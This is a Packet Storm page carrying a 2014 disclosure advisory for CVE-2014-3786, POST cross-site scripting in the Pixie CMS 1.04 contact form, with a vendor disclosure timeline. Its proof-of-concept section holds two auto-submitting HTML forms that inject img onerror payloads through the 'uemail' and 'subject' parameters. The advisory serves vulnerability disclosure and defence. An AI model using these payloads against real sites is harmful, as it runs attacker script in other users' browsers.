what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Pixie CMS 1.04 Cross Site Scripting

Pixie CMS 1.04 Cross Site Scripting
Posted May 30, 2014
Authored by Simone Memoli, Filippos Mastrogiannis

Pixie CMS version 1.04 suffers from multiple POST cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2014-3786
SHA-256 | 44f2f2eb8165bcff34e009a24bd9116339537e4a7a92bbd61f1e3495c632eb87

Pixie CMS 1.04 Cross Site Scripting

Change Mirror Download
Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities

Vendor: Pixie CMS
Product web page: http://www.getpixie.co.uk
Affected version: 1.04
Severity: Medium
CVE: CVE-2014-3786
Demo page: http://demo.getpixie.co.uk

Discovered by: Filippos Mastrogiannis (@filipposmastro)
& Simone Memoli (@Simon90_Italy)

Pixie is a free, open source CMS software a.k.a a small, simple,
website maker (as the vendor states on its website)

Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in
the Contact form (contact.php). The user input through the POST parameters
'uemail' and 'subject' are not properly sanitized allowing the attacker to
execute HTML code into user's browser session on the affected site.

The vulnerable component is the contact module of the Pixie v1.04 and it
can be found at (/pixie_v1.04/admin/modules/contact.php) of the source code

Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7
with Mozilla Firefox 29.0.1

Proof Of Concept:

<html>
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='xss'>
</form>
<script>document.xss.submit();</script>
</html>

<html>
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='xss'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>
</form>
<script>document.xss.submit();</script>
</html>


Disclosure Timeline:

[13.05.2014] Vulnerabilities discovered.
[13.05.2014] Initial contact with the vendor.
[15.05.2014] 1st response from the official maintainer.
[30.05.2014] 2nd response from the official maintainer.
[30.05.2014] Public security advisory released.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close